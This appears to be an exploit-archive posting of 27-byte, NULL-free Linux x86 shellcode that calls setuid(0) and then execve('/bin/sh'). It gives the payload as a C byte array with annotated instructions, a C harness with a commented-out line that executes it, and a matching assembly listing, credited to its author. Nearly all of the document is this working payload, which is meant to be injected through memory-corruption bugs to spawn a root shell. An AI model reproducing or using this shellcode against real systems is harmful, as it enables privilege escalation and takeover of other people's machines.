-----------[ C Source Code ]----------- /* Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode without NULLs Coded by Chema Garcia (aka sch3m4) + sch3m4@opensec.es + http://opensec.es Shellcode Size: 27 bytes Date: 13/11/2008 */ #include const char shellcode[]= "\x31\xC0" //xor eax,eax "\x31\xC9" //xor ecx,ecx "\xB0\x17" //mov al,17h "\x60" //pusha "\xCD\x80" //int 80h "\x61" //popa "\x51" //push ecx "\x68\x6E\x2F\x73\x68" //push 0x68732f6e "\x68\x2F\x2F\x62\x69" //push 0x69622f2f "\x89\xE3" //mov ebx, esp "\xB0\x0B" //mov al,0xb "\xCD\x80"; //int 0x80 int main() { printf("Smallest GNU/Linux x86 setuid(0) && execve(\"/bin/sh\",0,0) Shellcode without NULLs" "\n\nCoded by Chema Garcia (aka sch3m4)" "\n\t + sch3m4@opensec.es" "\n\t + http://opensec.es" "\n\n[+] Shellcode Size: %d bytes\n\n",sizeof(shellcode)-1); //(*(void (*)()) shellcode)(); return 0; } -----------[/ C Source Code ]----------- -----------[ ASM Source Code ]----------- global _start section .text _start: xor eax,eax xor ecx,ecx mov al,17h pusha int 80h ;setuid popa push ecx push 0x68732f6e push 0x69622f2f mov ebx, esp mov al,0xb int 0x80;execve -----------[/ ASM Source Code ]----------- Greetings, Chema García